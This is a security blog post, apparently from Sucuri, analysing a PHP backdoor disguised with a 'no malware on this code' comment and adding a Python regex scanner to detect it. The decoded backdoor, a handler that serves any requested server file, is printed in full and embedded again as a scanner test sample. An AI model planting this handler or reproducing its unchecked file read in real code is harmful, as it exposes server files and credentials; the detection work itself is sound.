Backdoor: No malware on this code, you can check it by yourself

We were cleaning up an infected web site a few days ago and it had multiple backdoors. They all started like this:

// no malware on this code, you can check it by yourself ;-)

We see this very often: malware authors add legitimate-looking headers and messages to disguise what the code actually does, but never in such a direct way. I guess it just made the job easier for us…

You can see the full backdoor here:

Once decoded, the code is a backdoor that reads any file path supplied in the request and sends it back to the client as a download:

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
    // the path comes straight from the request, so any readable file on the server can be fetched
    $file = $_GET['dl'];
    $filez = @file_get_contents($file);
    header("Content-type: application/octet-stream");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
    echo $filez;
    exit;
} elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
    $file = $_GET['dlgzip'];
    …
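The shape of that handler (a request parameter copied into file_get_contents() and the result pushed to the client as an attachment) is easy to hunt for across a web root. The scanner below is an added example written for this post, not Sucuri's tooling: it scores a PHP file against a handful of indicators taken from the snippet above, reports files that cross a threshold, and embeds two constructed inputs, the backdoor as reconstructed here and a legitimate download handler that only lets the request pick a key from a fixed map. The indicator names, weights and threshold are assumptions chosen for the example.

```python
"""Flag PHP files that look like the "download any file" backdoor discussed above.

Added example, not Sucuri's code. Each indicator is a regex with a weight; a file
is reported when the sum of the matching weights reaches THRESHOLD. The weights
and threshold are assumptions, tuned so that a whitelist-based download handler
(which legitimately uses the same headers) stays below the line.
"""
import re
import sys
from pathlib import Path

INDICATORS = [
    # file_get_contents($_GET[...]) with the request value used directly
    ("request_to_file_read",
     re.compile(r"file_get_contents\s*\(\s*\$_(GET|POST|REQUEST)\s*\[", re.I), 5),
    # $var = $_GET[...]; ... file_get_contents($var)  (the exact shape of the backdoor)
    ("request_assigned_then_read",
     re.compile(r"\$(\w+)\s*=\s*\$_(GET|POST|REQUEST)\s*\[[^\]]*\]\s*;"
                r".*?@?file_get_contents\s*\(\s*\$\1\s*\)", re.I | re.S), 5),
    # headers that turn the response into a raw download; common in legitimate code too
    ("octet_stream_download",
     re.compile(r"header\s*\(\s*[\"']Content-type:\s*application/octet-stream", re.I), 2),
    ("attachment_disposition",
     re.compile(r"Content-disposition:\s*attachment", re.I), 2),
    # error suppression on the read hides failed guesses from the server log
    ("suppressed_errors_on_read", re.compile(r"@file_get_contents", re.I), 1),
    # the self-declared "clean" comment seen in this infection
    ("self_declared_clean_comment", re.compile(r"no malware on this code", re.I), 3),
]
THRESHOLD = 6


def score_php(source: str) -> tuple[int, list[str]]:
    """Return (score, names of matching indicators) for one PHP source text."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def is_suspicious(source: str) -> bool:
    return score_php(source)[0] >= THRESHOLD


def scan_tree(root: Path) -> dict[str, tuple[int, list[str]]]:
    """Walk a web root and return {path: (score, hits)} for files at or above THRESHOLD."""
    findings = {}
    for path in root.rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue
        score, hits = score_php(src)
        if score >= THRESHOLD:
            findings[str(path)] = (score, hits)
    return findings


# Constructed sample: the backdoor from the post, as reconstructed above.
BACKDOOR_SAMPLE = r"""<?php
// no malware on this code, you can check it by yourself ;-)
if(isset($_GET['dl']) && ($_GET['dl'] != "")){
    $file = $_GET['dl'];
    $filez = @file_get_contents($file);
    header("Content-type: application/octet-stream");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
    echo $filez;
    exit;
}
"""

# Constructed sample: a legitimate handler where the request only selects a key.
CLEAN_SAMPLE = r"""<?php
$allowed = ['report' => '/var/www/files/report.pdf', 'manual' => '/var/www/files/manual.pdf'];
$key = $_GET['f'] ?? '';
if (!isset($allowed[$key])) { http_response_code(404); exit; }
$path = $allowed[$key];
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"" . basename($path) . "\"");
readfile($path);
"""

if __name__ == "__main__":
    for label, src in (("backdoor sample", BACKDOOR_SAMPLE), ("clean sample", CLEAN_SAMPLE)):
        score, hits = score_php(src)
        print(f"{label}: score={score} suspicious={score >= THRESHOLD} hits={hits}")
    if len(sys.argv) > 1:  # optional: python scan.py /var/www/html
        for path, (score, hits) in scan_tree(Path(sys.argv[1])).items():
            print(f"{score:3d}  {path}  {', '.join(hits)}")
```

The two download headers are deliberately weighted low because real download endpoints set them too; what separates the backdoor is the request value flowing into the file read, so that indicator alone is enough to push a file over the threshold. Treat the output as a triage list to read by hand, not as a verdict.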

To avoid getting your site blacklisted or infected with malware, visit to learn about our site security monitoring and malware removal solutions.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.